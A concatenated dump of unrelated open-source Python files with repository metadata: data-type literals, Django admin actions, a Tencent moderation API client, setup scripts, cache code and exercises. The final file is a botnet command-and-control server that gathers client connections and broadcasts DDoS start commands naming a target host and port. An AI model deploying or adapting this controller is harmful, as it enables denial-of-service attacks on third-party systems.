class FloatLiteral(ComparableLiteral):
def __init__(self, value):
super(FloatLiteral, self).__init__(value)
def to(self, type_var):
if type_var.type_id == TypeID.FLOAT:
return self
elif type_var.type_id == TypeID.DOUBLE:
return DoubleLiteral(self.value)
elif type_var.type_id == TypeID.DECIMAL:
if type_var.scale == 0:
return DecimalLiteral(Decimal(self.value)
.quantize(Decimal('1.'),
rounding=ROUND_HALF_UP))
else:
return DecimalLiteral(Decimal(self.value)
.quantize(Decimal("." + "".join(["0" for i in range(1, type_var.scale)]) + "1"),
rounding=ROUND_HALF_UP))
class DoubleLiteral(ComparableLiteral):
def __init__(self, value):
super(DoubleLiteral, self).__init__(value)
def to(self, type_var):
if type_var.type_id == TypeID.FLOAT:
if JAVA_MAX_FLOAT < self.value:
return ABOVE_MAX
elif JAVA_MIN_FLOAT > self.value:
return BELOW_MIN
return FloatLiteral(self.value)
elif type_var.type_id == TypeID.DOUBLE:
return self
elif type_var.type_id == TypeID.DECIMAL:
if type_var.scale == 0:
return DecimalLiteral(Decimal(self.value)
.quantize(Decimal('1.'),
rounding=ROUND_HALF_UP))
else:
return DecimalLiteral(Decimal(self.value)
.quantize(Decimal("." + "".join(["0" for i in range(1, type_var.scale)]) + "1"),
rounding=ROUND_HALF_UP))
class DateLiteral(ComparableLiteral):
def __init__(self, value):
super(DateLiteral, self).__init__(value)
def to(self, type_var):
if type_var.type_id == TypeID.DATE:
return self
class TimeLiteral(ComparableLiteral):
def __init__(self, value):
super(TimeLiteral, self).__init__(value)
def to(self, type_var):
if type_var.type_id == TypeID.TIME:
return self
class TimestampLiteral(ComparableLiteral):
def __init__(self, value):
super(TimestampLiteral, self).__init__(value)
def to(self, type_var):
if type_var.type_id == TypeID.TIMESTAMP:
return self
elif type_var.type_id == TypeID.DATE:
return DateLiteral((datetime.datetime.fromtimestamp(self.value / 1000000) - Literals.EPOCH).days)
class DecimalLiteral(ComparableLiteral):
def __init__(self, value):
super(DecimalLiteral, self).__init__(value)
def to(self, type_var):
if type_var.type_id == TypeID.DECIMAL and type_var.scale == abs(self.value.as_tuple().exponent):
return self
class StringLiteral(BaseLiteral):
def __init__(self, value):
super(StringLiteral, self).__init__(value)
def to(self, type_var): # noqa: C901
import dateutil.parser
if type_var.type_id == TypeID.DATE:
return DateLiteral((dateutil.parser.parse(self.value) - Literals.EPOCH).days)
elif type_var.type_id == TypeID.TIME:
return TimeLiteral(
int((dateutil.parser.parse(Literals.EPOCH.strftime("%Y-%m-%d ") + self.value) - Literals.EPOCH)
.total_seconds() * 1000000))
elif type_var.type_id == TypeID.TIMESTAMP:
timestamp = dateutil.parser.parse(self.value)
EPOCH = Literals.EPOCH
if bool(timestamp.tzinfo) != bool(type_var.adjust_to_utc):
raise RuntimeError("Cannot convert to %s when string is: %s" % (type_var, self.value))
if timestamp.tzinfo is not None:
EPOCH = EPOCH.replace(tzinfo=pytz.UTC)
return TimestampLiteral(int((timestamp - EPOCH).total_seconds() * 1000000))
elif type_var.type_id == TypeID.STRING:
return self
elif type_var.type_id == TypeID.UUID:
return UUIDLiteral(uuid.UUID(self.value))
elif type_var.type_id == TypeID.DECIMAL:
dec_val = Decimal(str(self.value))
if abs(dec_val.as_tuple().exponent) == type_var.scale:
if type_var.scale == 0:
return DecimalLiteral(Decimal(str(self.value))
.quantize(Decimal('1.'),
rounding=ROUND_HALF_UP))
else:
return DecimalLiteral(Decimal(str(self.value))
.quantize(Decimal("." + "".join(["0" for i in range(1, type_var.scale)]) + "1"),
rounding=ROUND_HALF_UP))
def __eq__(self, other):
if id(self) == id(other):
return True
if other is None or not isinstance(other, StringLiteral):
return False
return self.value == other.value
def __ne__(self, other):
return not self.__eq__(other)
def __lt__(self, other):
if other is None:
return False
return self.value < other.value
def __gt__(self, other):
if other is None:
return True
return self.value > other.value
def __le__(self, other):
if other is None:
return False
return self.value <= other.value
def __ge__(self, other):
if other is None:
return True
return self.value >= other.value
def __str__(self):
return '"' + self.value + '"'
class UUIDLiteral(ComparableLiteral):
def __init__(self, value):
super(UUIDLiteral, self).__init__(value)
def to(self, type_var):
if type_var.type_id == TypeID.UUID:
return self
class FixedLiteral(BaseLiteral):
def __init__(self, value):
super(FixedLiteral, self).__init__(value)
def to(self, type_var):
if type_var.type_id == TypeID.FIXED:
if len(self.value) == type_var.length:
return self
elif type_var.type_id == TypeID.BINARY:
return BinaryLiteral(self.value)
def write_replace(self):
return FixedLiteralProxy(self.value)
def __eq__(self, other):
return self.value == other.value
def __ne__(self, other):
return not self.__eq__(other)
def __lt__(self, other):
if other is None:
return False
return self.value < other.value
def __gt__(self, other):
if other is None:
return True
return self.value > other.value
def __le__(self, other):
if other is None:
return False
return self.value <= other.value
def __ge__(self, other):
if other is None:
return True
return self.value >= other.value
class BinaryLiteral(BaseLiteral):
def __init__(self, value):
super(BinaryLiteral, self).__init__(value)
def to(self, type_var):
if type_var.type_id == TypeID.FIXED:
if type_var.length == len(self.value):
return FixedLiteral(self.value)
return None
elif type_var.type_id == TypeID.BINARY:
return self
def write_replace(self):
return BinaryLiteralProxy(self.value)
def __eq__(self, other):
return self.value == other.value
def __ne__(self, other):
return not self.__eq__(other)
def __lt__(self, other):
if other is None:
return False
return self.value < other.value
def __gt__(self, other):
if other is None:
return True
return self.value > other.value
def __le__(self, other):
if other is None:
return False
return self.value <= other.value
def __ge__(self, other):
if other is None:
return True
return self.value >= other.value
class FixedLiteralProxy(object):
def __init__(self, buffer=None):
if buffer is not None:
self.bytes = list(buffer)
def read_resolve(self):
return FixedLiteral(self.bytes)
class ConstantExpressionProxy(object):
def __init__(self, true_or_false=None):
if true_or_false is not None:
self.true_or_false = true_or_false
def read_resolve(self):
if self.true_or_false:
return TRUE
else:
return FALSE
class BinaryLiteralProxy(FixedLiteralProxy):
def __init__(self, buffer=None):
super(BinaryLiteralProxy, self).__init__(buffer)
def read_resolve(self):
return BinaryLiteral(self.bytes)
ABOVE_MAX = AboveMax()
BELOW_MIN = BelowMin()
| 29.867241
| 122
| 0.594585
|
507e0de3ef81e8e585298c6980bf3745630f69a2
| 800
|
py
|
Python
|
snippets/admin/actions.py
|
wizzzet/github_backend
|
9e4b5d3273e850e4ac0f425d22911987be7a7eff
|
[
"MIT"
] | null | null | null |
snippets/admin/actions.py
|
wizzzet/github_backend
|
9e4b5d3273e850e4ac0f425d22911987be7a7eff
|
[
"MIT"
] | null | null | null |
snippets/admin/actions.py
|
wizzzet/github_backend
|
9e4b5d3273e850e4ac0f425d22911987be7a7eff
|
[
"MIT"
] | null | null | null |
from django.utils.translation import ugettext_lazy as _
from snippets.choices import StatusChoices
def activate(modeladmin, request, queryset):
queryset.update(is_active=True)
activate.short_description = _('Активировать')
def deactivate(modeladmin, request, queryset):
queryset.update(is_active=False)
deactivate.short_description = _('Деактивировать')
def draft(modeladmin, request, queryset):
queryset.update(status=StatusChoices.DRAFT.value)
draft.short_description = _('В черновики')
def hide(modeladmin, request, queryset):
queryset.update(status=StatusChoices.HIDDEN.value)
hide.short_description = _('Скрыть')
def publish(modeladmin, request, queryset):
queryset.update(status=StatusChoices.PUBLIC.value)
publish.short_description = _('Опубликовать')
| 20.512821
| 55
| 0.78
|
9d5e01a5bdfe49b336d70a90fa40c43f539b3e18
| 377
|
py
|
Python
|
Python/DataStructures/Stack/reverse_int_using_stack.py
|
ThunderZ007/Data-Structures-and-Algorithms
|
148415faf6472115f6848b1a4e21b660b6d327da
|
[
"MIT"
] | 245
|
2020-10-05T14:52:37.000Z
|
2022-03-29T07:40:38.000Z
|
Python/DataStructures/Stack/reverse_int_using_stack.py
|
ThunderZ007/Data-Structures-and-Algorithms
|
148415faf6472115f6848b1a4e21b660b6d327da
|
[
"MIT"
] | 521
|
2020-10-05T15:25:29.000Z
|
2021-11-09T13:24:01.000Z
|
Python/DataStructures/Stack/reverse_int_using_stack.py
|
ThunderZ007/Data-Structures-and-Algorithms
|
148415faf6472115f6848b1a4e21b660b6d327da
|
[
"MIT"
] | 521
|
2020-10-05T15:29:42.000Z
|
2022-03-27T10:22:00.000Z
|
st = [];
def push_digits(number):
while (number != 0):
st.append(number % 10);
number = int(number / 10);
def reverse_number(number):
push_digits(number);
reverse = 0;
i = 1;
while (len(st) > 0):
reverse = reverse + (st[len(st) - 1] * i);
st.pop();
i = i * 10;
return reverse;
number = int(input());
print(reverse_number(number));
| 13.464286
| 45
| 0.562334
|
2ac3bf1013fb97d41b6e3eb5ad94045c0c1c98da
| 10,286
|
py
|
Python
|
tencentcloud/cms/v20190321/cms_client.py
|
RedheatWei/tencentcloud-sdk-python
|
140d4e60e8bdd89f3e5ae1d8aef0bfe4fa999521
|
[
"Apache-2.0"
] | 1
|
2019-07-16T08:45:02.000Z
|
2019-07-16T08:45:02.000Z
|
tencentcloud/cms/v20190321/cms_client.py
|
RedheatWei/tencentcloud-sdk-python
|
140d4e60e8bdd89f3e5ae1d8aef0bfe4fa999521
|
[
"Apache-2.0"
] | null | null | null |
tencentcloud/cms/v20190321/cms_client.py
|
RedheatWei/tencentcloud-sdk-python
|
140d4e60e8bdd89f3e5ae1d8aef0bfe4fa999521
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf8 -*-
# Copyright (c) 2017-2018 THL A29 Limited, a Tencent company. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
from tencentcloud.common.exception.tencent_cloud_sdk_exception import TencentCloudSDKException
from tencentcloud.common.abstract_client import AbstractClient
from tencentcloud.cms.v20190321 import models
class CmsClient(AbstractClient):
_apiVersion = '2019-03-21'
_endpoint = 'cms.tencentcloudapi.com'
def AudioModeration(self, request):
"""音频内容检测(Audio Moderation, AM)服务使用了波形分析、声纹分析等技术,能识别涉黄、涉政、涉恐等违规音频,同时支持用户配置音频黑库,打击自定义的违规内容。
:param request: 调用AudioModeration所需参数的结构体。
:type request: :class:`tencentcloud.cms.v20190321.models.AudioModerationRequest`
:rtype: :class:`tencentcloud.cms.v20190321.models.AudioModerationResponse`
"""
try:
params = request._serialize()
body = self.call("AudioModeration", params)
response = json.loads(body)
if "Error" not in response["Response"]:
model = models.AudioModerationResponse()
model._deserialize(response["Response"])
return model
else:
code = response["Response"]["Error"]["Code"]
message = response["Response"]["Error"]["Message"]
reqid = response["Response"]["RequestId"]
raise TencentCloudSDKException(code, message, reqid)
except Exception as e:
if isinstance(e, TencentCloudSDKException):
raise
else:
raise TencentCloudSDKException(e.message, e.message)
def CreateTextSample(self, request):
"""新增文本类型样本库
:param request: 调用CreateTextSample所需参数的结构体。
:type request: :class:`tencentcloud.cms.v20190321.models.CreateTextSampleRequest`
:rtype: :class:`tencentcloud.cms.v20190321.models.CreateTextSampleResponse`
"""
try:
params = request._serialize()
body = self.call("CreateTextSample", params)
response = json.loads(body)
if "Error" not in response["Response"]:
model = models.CreateTextSampleResponse()
model._deserialize(response["Response"])
return model
else:
code = response["Response"]["Error"]["Code"]
message = response["Response"]["Error"]["Message"]
reqid = response["Response"]["RequestId"]
raise TencentCloudSDKException(code, message, reqid)
except Exception as e:
if isinstance(e, TencentCloudSDKException):
raise
else:
raise TencentCloudSDKException(e.message, e.message)
def DeleteTextSample(self, request):
"""删除文字样本库,暂时只支持单个删除
:param request: 调用DeleteTextSample所需参数的结构体。
:type request: :class:`tencentcloud.cms.v20190321.models.DeleteTextSampleRequest`
:rtype: :class:`tencentcloud.cms.v20190321.models.DeleteTextSampleResponse`
"""
try:
params = request._serialize()
body = self.call("DeleteTextSample", params)
response = json.loads(body)
if "Error" not in response["Response"]:
model = models.DeleteTextSampleResponse()
model._deserialize(response["Response"])
return model
else:
code = response["Response"]["Error"]["Code"]
message = response["Response"]["Error"]["Message"]
reqid = response["Response"]["RequestId"]
raise TencentCloudSDKException(code, message, reqid)
except Exception as e:
if isinstance(e, TencentCloudSDKException):
raise
else:
raise TencentCloudSDKException(e.message, e.message)
def DescribeModerationOverview(self, request):
"""根据日期,渠道和服务类型查询识别结果概览数据
:param request: 调用DescribeModerationOverview所需参数的结构体。
:type request: :class:`tencentcloud.cms.v20190321.models.DescribeModerationOverviewRequest`
:rtype: :class:`tencentcloud.cms.v20190321.models.DescribeModerationOverviewResponse`
"""
try:
params = request._serialize()
body = self.call("DescribeModerationOverview", params)
response = json.loads(body)
if "Error" not in response["Response"]:
model = models.DescribeModerationOverviewResponse()
model._deserialize(response["Response"])
return model
else:
code = response["Response"]["Error"]["Code"]
message = response["Response"]["Error"]["Message"]
reqid = response["Response"]["RequestId"]
raise TencentCloudSDKException(code, message, reqid)
except Exception as e:
if isinstance(e, TencentCloudSDKException):
raise
else:
raise TencentCloudSDKException(e.message, e.message)
def DescribeTextSample(self, request):
"""支持批量查询文字样本库
:param request: 调用DescribeTextSample所需参数的结构体。
:type request: :class:`tencentcloud.cms.v20190321.models.DescribeTextSampleRequest`
:rtype: :class:`tencentcloud.cms.v20190321.models.DescribeTextSampleResponse`
"""
try:
params = request._serialize()
body = self.call("DescribeTextSample", params)
response = json.loads(body)
if "Error" not in response["Response"]:
model = models.DescribeTextSampleResponse()
model._deserialize(response["Response"])
return model
else:
code = response["Response"]["Error"]["Code"]
message = response["Response"]["Error"]["Message"]
reqid = response["Response"]["RequestId"]
raise TencentCloudSDKException(code, message, reqid)
except Exception as e:
if isinstance(e, TencentCloudSDKException):
raise
else:
raise TencentCloudSDKException(e.message, e.message)
def ImageModeration(self, request):
"""图片内容检测服务(Image Moderation, IM)能自动扫描图片,识别涉黄、涉恐、涉政、涉毒等有害内容,同时支持用户配置图片黑名单,打击自定义的违规图片。
:param request: 调用ImageModeration所需参数的结构体。
:type request: :class:`tencentcloud.cms.v20190321.models.ImageModerationRequest`
:rtype: :class:`tencentcloud.cms.v20190321.models.ImageModerationResponse`
"""
try:
params = request._serialize()
body = self.call("ImageModeration", params)
response = json.loads(body)
if "Error" not in response["Response"]:
model = models.ImageModerationResponse()
model._deserialize(response["Response"])
return model
else:
code = response["Response"]["Error"]["Code"]
message = response["Response"]["Error"]["Message"]
reqid = response["Response"]["RequestId"]
raise TencentCloudSDKException(code, message, reqid)
except Exception as e:
if isinstance(e, TencentCloudSDKException):
raise
else:
raise TencentCloudSDKException(e.message, e.message)
def TextModeration(self, request):
"""文本内容检测(Text Moderation)服务使用了深度学习技术,识别涉黄、涉政、涉恐等有害内容,同时支持用户配置词库,打击自定义的违规文本。
:param request: 调用TextModeration所需参数的结构体。
:type request: :class:`tencentcloud.cms.v20190321.models.TextModerationRequest`
:rtype: :class:`tencentcloud.cms.v20190321.models.TextModerationResponse`
"""
try:
params = request._serialize()
body = self.call("TextModeration", params)
response = json.loads(body)
if "Error" not in response["Response"]:
model = models.TextModerationResponse()
model._deserialize(response["Response"])
return model
else:
code = response["Response"]["Error"]["Code"]
message = response["Response"]["Error"]["Message"]
reqid = response["Response"]["RequestId"]
raise TencentCloudSDKException(code, message, reqid)
except Exception as e:
if isinstance(e, TencentCloudSDKException):
raise
else:
raise TencentCloudSDKException(e.message, e.message)
def VideoModeration(self, request):
"""视频内容检测(Video Moderation, VM)服务能识别涉黄、涉政、涉恐等违规视频,同时支持用户配置视频黑库,打击自定义的违规内容。
:param request: 调用VideoModeration所需参数的结构体。
:type request: :class:`tencentcloud.cms.v20190321.models.VideoModerationRequest`
:rtype: :class:`tencentcloud.cms.v20190321.models.VideoModerationResponse`
"""
try:
params = request._serialize()
body = self.call("VideoModeration", params)
response = json.loads(body)
if "Error" not in response["Response"]:
model = models.VideoModerationResponse()
model._deserialize(response["Response"])
return model
else:
code = response["Response"]["Error"]["Code"]
message = response["Response"]["Error"]["Message"]
reqid = response["Response"]["RequestId"]
raise TencentCloudSDKException(code, message, reqid)
except Exception as e:
if isinstance(e, TencentCloudSDKException):
raise
else:
raise TencentCloudSDKException(e.message, e.message)
| 41.309237
| 99
| 0.6084
|
077982c89dc7723d7ff60702256c5108fb2c5623
| 2,019
|
py
|
Python
|
src/m7_summary.py
|
goinjl/01-IntroductionToPython
|
f24e65ac658f580f59d30f1cfec1078dc2ad74df
|
[
"MIT"
] | null | null | null |
src/m7_summary.py
|
goinjl/01-IntroductionToPython
|
f24e65ac658f580f59d30f1cfec1078dc2ad74df
|
[
"MIT"
] | null | null | null |
src/m7_summary.py
|
goinjl/01-IntroductionToPython
|
f24e65ac658f580f59d30f1cfec1078dc2ad74df
|
[
"MIT"
] | null | null | null |
"""
An exercise that summarizes what you have learned in this Session.
Authors: David Mutchler, Vibha Alangar, Matt Boutell, Dave Fisher,
Aaron Wilkin, their colleagues, and Jacey.
"""
########################################################################
# DONE: 1.
# On Line 5 above, replace PUT_YOUR_NAME_HERE with your own name.
########################################################################
import rosegraphics as rg
########################################################################
#
# DONE: 2.
# Write code that accomplishes the following (and ONLY the following),
# in the order listed:
#
# - Constructs a SimpleTurtle with a 'blue' Pen.
#
# - Makes the SimpleTurtle go straight UP 200 pixels.
#
# - Makes the SimpleTurtle lift its pen UP
# (so that the next movements do NOT leave a "trail")
# HINT: Use the "dot trick" to figure out how to do this.
#
# - Makes the SimpleTurtle go to the Point at (100, -40).
#
# - Makes the SimpleTurtle put its pen DOWN
# (so that the next movements will return to leaving a "trail").
#
# - Makes the SimpleTurtle's pen have color 'green' and thickness 10.
#
# - Makes the SimpleTurtle go 150 pixels straight DOWN.
#
# Don't forget to:
# - import rosegraphics and construct a TurtleWindow
# at the BEGINNING of your code, and to
# - ask your TurtleWindow to close_on_mouse_click
# as the LAST line of your code.
# See the beginning and end of m4e_loopy_turtles for an example.
#
# As always, test by running the module.
# As always, COMMIT-and-PUSH when you are done with this module.
#
########################################################################
window = rg.TurtleWindow()
jacey = rg.SimpleTurtle()
jacey = rg.SimpleTurtle('turtle')
jacey.pen = rg.Pen('blue',1)
jacey.left(90)
jacey.forward(200)
jacey.pen_up()
jacey.go_to(rg.Point(100, -40))
jacey.pen_down()
jacey.pen = rg.Pen('green',10)
jacey.backward(150)
window.close_on_mouse_click()
| 35.421053
| 72
| 0.590887
|
56a8f6b651f4fa959f24619332fd41b428ed605c
| 2,472
|
py
|
Python
|
setup.py
|
rhunwicks/tablib
|
bbdf5f11ab0c77e0b8907c593cdd73e287c2948d
|
[
"MIT"
] | null | null | null |
setup.py
|
rhunwicks/tablib
|
bbdf5f11ab0c77e0b8907c593cdd73e287c2948d
|
[
"MIT"
] | null | null | null |
setup.py
|
rhunwicks/tablib
|
bbdf5f11ab0c77e0b8907c593cdd73e287c2948d
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
import tablib
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
if sys.argv[-1] == 'publish':
os.system("python setup.py sdist upload")
sys.exit()
if sys.argv[-1] == 'speedups':
try:
__import__('pip')
except ImportError:
print('Pip required.')
sys.exit(1)
os.system('pip install ujson pyyaml')
sys.exit()
if sys.argv[-1] == 'test':
try:
__import__('py')
except ImportError:
print('py.test required.')
sys.exit(1)
errors = os.system('py.test test_tablib.py')
sys.exit(bool(errors))
packages = [
'tablib', 'tablib.formats',
'tablib.packages',
'tablib.packages.omnijson',
'tablib.packages.unicodecsv',
'tablib.packages.xlwt',
'tablib.packages.xlrd',
'tablib.packages.odf',
'tablib.packages.openpyxl',
'tablib.packages.openpyxl.shared',
'tablib.packages.openpyxl.reader',
'tablib.packages.openpyxl.writer',
'tablib.packages.yaml',
'tablib.packages.dbfpy',
'tablib.packages.xlwt3',
'tablib.packages.xlrd3',
'tablib.packages.odf3',
'tablib.packages.openpyxl3',
'tablib.packages.openpyxl3.shared',
'tablib.packages.openpyxl3.reader',
'tablib.packages.openpyxl3.writer',
'tablib.packages.yaml3',
'tablib.packages.dbfpy3'
]
setup(
name='tablib',
version=tablib.__version__,
description='Format agnostic tabular data library (XLS, JSON, YAML, CSV)',
long_description=(open('README.rst').read() + '\n\n' +
open('HISTORY.rst').read()),
author='Kenneth Reitz',
author_email='me@kennethreitz.org',
url='http://python-tablib.org',
packages=packages,
license='MIT',
classifiers=(
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Natural Language :: English',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Programming Language :: Python :: 2.5',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.0',
'Programming Language :: Python :: 3.1',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
),
tests_require=['pytest'],
)
| 26.580645
| 78
| 0.618932
|
e8e523c795b546f3fef0bab80a23f3470ef5cf32
| 3,311
|
py
|
Python
|
c7n/cache.py
|
dnouri/cloud-custodian
|
4e8b3b45f60731df942ffe6b61645416d7a67daa
|
[
"Apache-2.0"
] | 1
|
2020-09-07T21:10:29.000Z
|
2020-09-07T21:10:29.000Z
|
c7n/cache.py
|
dnouri/cloud-custodian
|
4e8b3b45f60731df942ffe6b61645416d7a67daa
|
[
"Apache-2.0"
] | 1
|
2021-02-10T02:20:45.000Z
|
2021-02-10T02:20:45.000Z
|
c7n/cache.py
|
dnouri/cloud-custodian
|
4e8b3b45f60731df942ffe6b61645416d7a67daa
|
[
"Apache-2.0"
] | 1
|
2021-05-02T01:49:36.000Z
|
2021-05-02T01:49:36.000Z
|
# Copyright 2015-2017 Capital One Services, LLC
# Copyright The Cloud Custodian Authors.
# SPDX-License-Identifier: Apache-2.0
"""Provide basic caching services to avoid extraneous queries over
multiple policies on the same resource type.
"""
import pickle
import os
import logging
import time
log = logging.getLogger('custodian.cache')
CACHE_NOTIFY = False
def factory(config):
global CACHE_NOTIFY
if not config:
return NullCache(None)
if not config.cache or not config.cache_period:
if not CACHE_NOTIFY:
log.debug("Disabling cache")
CACHE_NOTIFY = True
return NullCache(config)
elif config.cache == 'memory':
if not CACHE_NOTIFY:
log.debug("Using in-memory cache")
CACHE_NOTIFY = True
return InMemoryCache()
return FileCacheManager(config)
class NullCache:
def __init__(self, config):
self.config = config
def load(self):
return False
def get(self, key):
pass
def save(self, key, data):
pass
def size(self):
return 0
class InMemoryCache:
# Running in a temporary environment, so keep as a cache.
__shared_state = {}
def __init__(self):
self.data = self.__shared_state
def load(self):
return True
def get(self, key):
return self.data.get(pickle.dumps(key))
def save(self, key, data):
self.data[pickle.dumps(key)] = data
def size(self):
return sum(map(len, self.data.values()))
class FileCacheManager:
def __init__(self, config):
self.config = config
self.cache_period = config.cache_period
self.cache_path = os.path.abspath(
os.path.expanduser(
os.path.expandvars(
config.cache)))
self.data = {}
def get(self, key):
k = pickle.dumps(key)
return self.data.get(k)
def load(self):
if self.data:
return True
if os.path.isfile(self.cache_path):
if (time.time() - os.stat(self.cache_path).st_mtime >
self.config.cache_period * 60):
return False
with open(self.cache_path, 'rb') as fh:
try:
self.data = pickle.load(fh)
except EOFError:
return False
log.debug("Using cache file %s" % self.cache_path)
return True
def save(self, key, data):
try:
with open(self.cache_path, 'wb') as fh:
self.data[pickle.dumps(key)] = data
pickle.dump(self.data, fh, protocol=2)
except Exception as e:
log.warning("Could not save cache %s err: %s" % (
self.cache_path, e))
if not os.path.exists(self.cache_path):
directory = os.path.dirname(self.cache_path)
log.info('Generating Cache directory: %s.' % directory)
try:
os.makedirs(directory)
except Exception as e:
log.warning("Could not create directory: %s err: %s" % (
directory, e))
def size(self):
return os.path.exists(self.cache_path) and os.path.getsize(self.cache_path) or 0
| 26.070866
| 88
| 0.573543
|
ffa4a5ca8444e6d01612d92df1ffdf39d1dce910
| 505
|
py
|
Python
|
setup.py
|
vnep-approx-latency/alib
|
d3dd943011acd55e890f67b7539bad54060210bc
|
[
"MIT"
] | 2
|
2020-06-24T17:20:46.000Z
|
2022-03-23T09:58:51.000Z
|
setup.py
|
vnep-approx-latency/alib
|
d3dd943011acd55e890f67b7539bad54060210bc
|
[
"MIT"
] | null | null | null |
setup.py
|
vnep-approx-latency/alib
|
d3dd943011acd55e890f67b7539bad54060210bc
|
[
"MIT"
] | null | null | null |
from setuptools import setup, find_packages
install_requires = [
# "gurobipy", # install this manually
"matplotlib",
"numpy",
"click",
"pyyaml",
"jsonpickle",
"unidecode",
"networkx",
"pytest"
]
setup(
name="alib",
python_requires=">=3.7",
packages=["alib"],
package_data={"alib": ["data/topologyZoo/*.yml"]},
install_requires=install_requires,
entry_points={
"console_scripts": [
"alib = alib.cli:cli",
]
}
)
| 18.703704
| 54
| 0.572277
|
c6aff590223d0caceb086c7059e4d5cf211d4324
| 3,563
|
py
|
Python
|
hwilib/devices/trezorlib/messages/Features.py
|
tomatoskittles/HWI
|
ccb55228a80725ff85b96d55874acc688320b30b
|
[
"MIT"
] | 9
|
2019-04-23T01:10:28.000Z
|
2022-02-21T02:25:06.000Z
|
hwilib/devices/trezorlib/messages/Features.py
|
tomatoskittles/HWI
|
ccb55228a80725ff85b96d55874acc688320b30b
|
[
"MIT"
] | null | null | null |
hwilib/devices/trezorlib/messages/Features.py
|
tomatoskittles/HWI
|
ccb55228a80725ff85b96d55874acc688320b30b
|
[
"MIT"
] | 1
|
2020-07-17T18:49:34.000Z
|
2020-07-17T18:49:34.000Z
|
# Automatically generated by pb2py
# fmt: off
from .. import protobuf as p
class Features(p.MessageType):
MESSAGE_WIRE_TYPE = 17
def __init__(
self,
vendor: str = None,
major_version: int = None,
minor_version: int = None,
patch_version: int = None,
bootloader_mode: bool = None,
device_id: str = None,
pin_protection: bool = None,
passphrase_protection: bool = None,
language: str = None,
label: str = None,
initialized: bool = None,
revision: bytes = None,
bootloader_hash: bytes = None,
imported: bool = None,
pin_cached: bool = None,
passphrase_cached: bool = None,
firmware_present: bool = None,
needs_backup: bool = None,
flags: int = None,
model: str = None,
fw_major: int = None,
fw_minor: int = None,
fw_patch: int = None,
fw_vendor: str = None,
fw_vendor_keys: bytes = None,
unfinished_backup: bool = None,
no_backup: bool = None,
) -> None:
self.vendor = vendor
self.major_version = major_version
self.minor_version = minor_version
self.patch_version = patch_version
self.bootloader_mode = bootloader_mode
self.device_id = device_id
self.pin_protection = pin_protection
self.passphrase_protection = passphrase_protection
self.language = language
self.label = label
self.initialized = initialized
self.revision = revision
self.bootloader_hash = bootloader_hash
self.imported = imported
self.pin_cached = pin_cached
self.passphrase_cached = passphrase_cached
self.firmware_present = firmware_present
self.needs_backup = needs_backup
self.flags = flags
self.model = model
self.fw_major = fw_major
self.fw_minor = fw_minor
self.fw_patch = fw_patch
self.fw_vendor = fw_vendor
self.fw_vendor_keys = fw_vendor_keys
self.unfinished_backup = unfinished_backup
self.no_backup = no_backup
@classmethod
def get_fields(cls):
return {
1: ('vendor', p.UnicodeType, 0),
2: ('major_version', p.UVarintType, 0),
3: ('minor_version', p.UVarintType, 0),
4: ('patch_version', p.UVarintType, 0),
5: ('bootloader_mode', p.BoolType, 0),
6: ('device_id', p.UnicodeType, 0),
7: ('pin_protection', p.BoolType, 0),
8: ('passphrase_protection', p.BoolType, 0),
9: ('language', p.UnicodeType, 0),
10: ('label', p.UnicodeType, 0),
12: ('initialized', p.BoolType, 0),
13: ('revision', p.BytesType, 0),
14: ('bootloader_hash', p.BytesType, 0),
15: ('imported', p.BoolType, 0),
16: ('pin_cached', p.BoolType, 0),
17: ('passphrase_cached', p.BoolType, 0),
# 18: ('firmware_present', p.BoolType, 0),
# 19: ('needs_backup', p.BoolType, 0),
# 20: ('flags', p.UVarintType, 0),
21: ('model', p.UnicodeType, 0),
# 22: ('fw_major', p.UVarintType, 0),
# 23: ('fw_minor', p.UVarintType, 0),
# 24: ('fw_patch', p.UVarintType, 0),
# 25: ('fw_vendor', p.UnicodeType, 0),
# 26: ('fw_vendor_keys', p.BytesType, 0),
# 27: ('unfinished_backup', p.BoolType, 0),
# 28: ('no_backup', p.BoolType, 0),
}
| 36.357143
| 58
| 0.564412
|
49d69a802a7722a38850c2a7566ea0d99b926e92
| 1,093
|
py
|
Python
|
refer/ddos_server_from_author.py
|
satan1a/DDoS_Attacket_v0.1
|
dd86c48d9f7fe274127760aed5c8dcfd5bc014cb
|
[
"MIT"
] | 15
|
2019-10-27T17:44:58.000Z
|
2022-02-24T01:58:34.000Z
|
refer/ddos_server_from_author.py
|
satan1a/DDoS_Attacket_v0.1
|
dd86c48d9f7fe274127760aed5c8dcfd5bc014cb
|
[
"MIT"
] | null | null | null |
refer/ddos_server_from_author.py
|
satan1a/DDoS_Attacket_v0.1
|
dd86c48d9f7fe274127760aed5c8dcfd5bc014cb
|
[
"MIT"
] | 5
|
2019-10-28T02:14:35.000Z
|
2021-10-20T07:27:48.000Z
|
import socket
import argparse
from threading import Thread
socketList = []
# Command format '#-H xxx.xxx.xxx.xxx -p xxxx -c <start|stop>'
# Send command
def sendCmd(cmd):
print("Send command......")
for sock in socketList:
sock.send(cmd.encode('UTF-8'))
# Wait connect
def waitConnect(s):
while True:
sock, addr = s.accept()
if sock not in socketList:
socketList.append(sock)
def main():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('0.0.0.0', 58868))
s.listen(1024)
t = Thread(target = waitConnect, args = (s, ))
t.start()
print('Wait at least a client connection!')
while not len(socketList):
pass
print('It has been a client connection!')
while True:
print('=' * 50)
print('The command format:"#-H xxx.xxx.xxx.xxx -p xxx -c <start>"')
# Wait for input command
cmd_str = input("Please input cmd:")
if len(cmd_str):
if cmd_str[0] == '#':
sendCmd(cmd_str)
if __name__ == '__main__':
main()
| 25.418605
| 75
| 0.58097
|
